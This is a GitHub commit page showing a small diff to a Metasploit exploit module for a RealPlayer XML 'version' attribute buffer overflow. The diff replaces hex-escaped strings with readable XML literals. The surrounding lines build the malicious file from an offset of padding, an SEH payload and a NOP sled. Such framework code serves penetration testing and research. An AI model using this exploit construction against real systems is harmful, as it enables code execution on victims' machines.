We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 44ab583 commit 0ac495fCopy full SHA for 0ac495f
modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -76,11 +76,11 @@ def initialize(info = {})
76
77
def exploit
78
79
- sploit = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
+ sploit = "<?xml version=\"";
80
sploit << rand_text_alpha_upper(target['Offset'])
81
sploit << generate_seh_payload(target.ret)
82
sploit << make_nops(target['Max']-sploit.length)
83
- sploit << "\x22\x3f\x3e\x3b"
+ sploit << "\"?>";
84
85
# Create the file
86
print_status("Creating '#{datastore['FILENAME']}' file ...")
0 commit comments